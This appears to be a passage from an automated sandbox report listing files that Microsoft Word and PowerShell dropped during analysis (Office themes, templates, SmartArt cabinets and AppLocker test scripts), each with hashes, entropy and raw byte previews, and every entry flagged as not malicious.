                                                                                                                                                Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD8192.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):274
                                                                                                                                                Entropy (8bit):3.5303110391598502
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                                                                                                                                                MD5:8D1E1991838307E4C2197ECB5BA9FA79
                                                                                                                                                SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                                                                                                                                                SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                                                                                                                                                SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.s.h...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD855D.tmp\Vapor_Trail.thmx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):3611324
                                                                                                                                                Entropy (8bit):7.965784120725206
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                                                                                MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                                                                                SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                                                                                SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                                                                                SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD855D.tmp\content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):288
                                                                                                                                                Entropy (8bit):3.5359188337181853
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                                                                                                                                                MD5:0FEA64606C519B78B7A52639FEA11492
                                                                                                                                                SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                                                                                                                                                SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                                                                                                                                                SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.p.o.r._.T.r.a.i.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD858D.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):274
                                                                                                                                                Entropy (8bit):3.4699940532942914
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXGWWYlIWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxny2WzIgN2RGHmD0wbnKYZAH+Vwv
                                                                                                                                                MD5:55BA5B2974A072B131249FD9FD42EB91
                                                                                                                                                SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                                                                                                                                                SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                                                                                                                                                SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.s.i.g.h.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD858D.tmp\Insight design set.dotx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3465076
                                                                                                                                                Entropy (8bit):7.898517227646252
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                                                                                MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                                                                                SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                                                                                SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                                                                                SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e4pek3x4.alp.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqwldmnt.0hl.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jobfxn4u.cnn.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vkvqjtxd.iee.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6C8B.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):22149
                                                                                                                                                Entropy (8bit):7.659898883631361
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                                                                                                                                                MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                                                                                                                                                SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                                                                                                                                                SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                                                                                                                                                SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....u.......D...........................u....?..................................HexagonRadial.glox.................Content.inf.........[.....`........./.mT.T6...CP..z5...0.PcUmCUSUCU.Q.P.0..f............^...H..2e.[..8...ld......*F.%.j.w!R..NA.L............ .r..z....$&.........P.=.r...O...e..dfv_.i%.C....^......?..x...+d..].B.3..EU...|Cc..z.`lQp..fr.....8!;.8.p.ZwH\.........~..T.t..]..H.]..S.2..Vt.....r.H../..-8........!:.Y&..|A..J.U...-.%..k..U...4m.. .q../..b.8.vc~......_q1.?..Bh.v.....L..I.$I..s.".u.. Y....I^5.v...3.......].^)b.t.j...=...Ze~.O...|.}T.._9c........L....BV.^......X..?.....{.>.j..5.m...d.7........g[..f.nST...i..t..|.T.jjS..4p.Pxu..*..W...|.A)..|9;....H.e.^.8D..S...M..Lj.|...M.m+..H.....8.&-....=.L.....n.v..M.9...l....=r......K.F.j.(.(xD.3..r'9.K..-...5..Z..x....._....a[...J...`.b_a\\j.ed..\.3.5....S.T...ms.....E...Xl.y.LH=...}..0.T...04.4..B[..H.....B{B9.h..=.8Mn.*.TL.c..y.s.?.c9$l...).h).6..;.X../_>Pl...O...U.R..v.dy$A

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6C9C.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):19893
                                                                                                                                                Entropy (8bit):7.592090622603185
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                                                                                                                                                MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                                                                                                                                                SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                                                                                                                                                SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                                                                                                                                                SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF............D................................?..................c...............TabbedArc.glox.....c...........Content.inf.;....Y.[.........B.....?.T..ZD...........^C...U.R<Z....z+.I.....Z..-.V...f.....lB..\P.....=.-p....w ...\.kD..x'v..T..A..............".8...d.........FD.ZL.h..T...bp.)9B.v..i..VX...&..\..7.s..qy...l........Rty.Y...rU..>.9...8....L..\.^x.kDU.|TJ..{kN.G..E..$.kvy?.. mv......P..4.....q.1.6<u....e..dD...4.1E..Xi.5.=....1.P.c.K~S...YMO:.?..cL.g.tq\.(b1....E..0A.i..C...BT.m.S......:...}.&U..#QL..O.O../..K......=..........0a..O............BYP......>f.......iu...7.K..;QO~.t....%N.s.]>~#../7YN.....C..9.=cY.......y..U5.....,.....u.....#_..SG.`NR*.....?*..d.R.k.rX$...&.... ..h.4T.D^k-xA...............Hz..ep)e..4..P."fo Ne...o.....0n.Exr.........H..v...A.."..%)2......5...".}j.o8...E.HRQ;}.. .._L.+.jz....{.U..}...=B.o.^..vZ.:5.Z.M....y{\(...N..9...EB*MG...!N.vy..^...nE..2..@.;.4..C..t.4....h..O.8.=.m./...|Lu.|mCU..b.^.n39.h[M...%D{..w.1

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6C9D.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):21357
                                                                                                                                                Entropy (8bit):7.641082043198371
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                                                                                                                                                MD5:97F5B7B7E9E1281999468A5C42CB12E7
                                                                                                                                                SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
                                                                                                                                                SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                                                                                                                                                SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....].......D...........................]....?..........{.......................rings.glox.................Content.inf..|^.....[......P........<.$.."..0R..xa.Ax#B..d... ....K,.....^.H.....H.........&.j.\f.. ..,....,..!k..R..e..!...E...........................><.RB.....~h...........Q................g..M|,...x.....qV7.u..\...F-N.{-..X..&Zig.~..{.A.p.Z...X..{,-n............`$.%.ND.....>].6cvZ.%d..*a.$..-.K.Hf....L..;.#...H....U,........P.@.*-$C.,.g...%YJE..$.jP........b...Y<..[U...MF]F.K...1... x.}3w.o.#,.}T.....w5+...=.=...c.F^....OM.=.......G_{n.*...WC.w!......{/.~.}..s..6_......)..Xy...4.....<..XZJ........#~._i....%..fM.V.?.q...q.....7...B..sVt...(.:..c....~.e...kGZ...C..(J..o...`...?.)-.T.l....&...gR.$.....g.:...2.e%F.....x....z0...K..a8B...........D..]....7....~.".DR...r)...}b)e.>.\h~f...(}.c........Q...o5H.........C.KC.(.L.l................R..a.pg{..\.......-b........}.C......qTS..%..r.lG..Q.1..Z.>a.D...tC..LV...Rs.C.M18x.:......%O.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6C9E.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20457
                                                                                                                                                Entropy (8bit):7.612540359660869
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                                                                                                                                                MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                                                                                                                                                SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                                                                                                                                                SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                                                                                                                                                SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF............D................................?..................................chevronaccent.glox.................Content.inf..O.$N...[.........B.....?.....$Zy..Zkr...y<.....Di-.aVX/....h..-.~........#.../.Fz....T...p....A..eHMe[..p...=................f..../%o......F@..=..$.B!....}.0..g..^vlI......f.W.F...Nm..2`...)...,.HL4.nsl.F.ir.k..e.!^.j2.v.iT....t...*..!h..Y...2Q..-.x.,.Xj.U.cj,....9.....)..W..n3f.......(cH.D.4M.!.+..4..3r..y......|r..@.PD.R..#...F..nJAR..1{-.....u3..$..L.b+h....:lZ.>....q.?. ~l..^.%.m....a...cG.h.?.|.?7.'....b.G.4..'..A...o.Z...//..?...d..*.....C..Z.....]Yv.g.]..... .........]x.#=.../.7;R.j....G.....zq=O`[.'5g.D.u..)..../../.v.JmCW.da....3.f..C.z%...S=....;A.q.|....z.E.aRu........ k..J"+.f.S.@.........eD4....\0..t./U..%.H..........M:..U.......J...Z..H.DG..u^..D..P....`.^b.........`c......#.....c.?...#..C.V.&.'..f.'...f.[..F.O..a...&..{TiXg4; .X."..0...B.#..^..........N"..w.@f...gd.S..K.....E....ZR...;.twR>.z.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6C9F.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):19288
                                                                                                                                                Entropy (8bit):7.570850633867256
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                                                                                                                                                MD5:B9A6FF715719EE9DE16421AB983CA745
                                                                                                                                                SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                                                                                                                                                SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                                                                                                                                                SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF....H.......D...........................H....?..................................VaryingWidthList.glox.................Content.inf...O.....[.... v.q......R.....>.%i.I.HhD.V...qt.....'....N...!..aw$(J.%(..A..h......l|.D.p9`..Y09.:.u....p. :,.*.YD=0.p. ......w.........*..<..;.....u.."......7[....8.....?^........-..;q.|.....B....PJ....r.K#.#.0'...}.........+gpR...T....5.iu.^I...A\..gK....}..z.B.nT.../.m.......N....E'1.E.\..o.....W..R.#.#...8.7...R.SbW-...%......$.obj.F..W_@....sY!........s.O..."k. ..b....j....v...P.\....7d...|"J.T...2p..m.&..r..,2.).....X.`...xt].U...b.h..V.....|L..N.Z.O#....o...1R.w30.g..?;..C.T.:$..MGY.C"i\.f..#..<.k...m..s.w. ..Ga].....wt.h|.Ta<.......(SO.]9.%a..Z... r._JH.=O...P.9a.v.....Kj.".T...m...4.?...F...$...y.....hbW.UA..u.&)....py.C{.=t.....n...}|H3A9.=..W..JJ..y./Y.E.M9..Z..w. .HB.YoIi..i.e..9;n...SpHw,....f....d>..g.m..z...... ...f...KP.M..U.....~vFD.fQ.P?......2!.n.....`@C!G...XI.].s,.X.'...u.E.o..f

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CA0.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):31008
                                                                                                                                                Entropy (8bit):7.806058951525675
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                                                                                                                                                MD5:E033CCBC7BA787A2F824CE0952E57D44
                                                                                                                                                SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                                                                                                                                                SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                                                                                                                                                SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:MSCF.....:......L............................:...?...................9......................mlaseventheditionofficeonline.xsl.L...............Content.inf.N.#.....[...>..9..3c.5...F.B.]Y.3..%d.8...v;....~Y.L.=..v..m.g...|K.B....$......s.......#CdE.p.p..@...j.Nl2'...L..N.G:-V:.d.....i..M........mK.w.....\W.<.`..b$.!..!3..rT.A..#.).;KZ...a.-..j&e`R.~7dIRS.I..f.ff....}.}....^[wo.uw..i.m7......v$.I..n....-.Z.M5...iH..Ea..., [..0.L...DH..." ..... .@...H.@..+...}.......*^..'.4*.tHa..f].gV..~.7V.....C..).(.U"..f.@l..j'..%\.u.UU.....9<13...5..=........./..Z..{..-.L].+Y.fL.<EJ.q..!.j....W..]E./.~Y>...GgQ..-....Q.C..5..T+...fO. .)..~.7..Y....+..U=.e..8w.m...._..S..v.d.* ......S3z.X)......u...t.......i.;.a...X.Ji....g.3.!.O.....T.f6..[U....O..Z.X.q.G....?.k]..?...8.u.;].8y.T.9D..!?R....:........3+.P.....7?m}..............1...y3.g.\c.ks^;?.f.U5...U.j....E.N.}.!.......).R1....~.....R.....3.J.f...l..E^:...&_..%..v...^..E...rC..O....M.#..<..H..bB.+.W..

                                                                                                                                                C:\Users\user\AppData\Local\Temp\cab6CA1.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):22594
                                                                                                                                                Entropy (8bit):7.674816892242868
                                                                                                                                                Encrypted:false
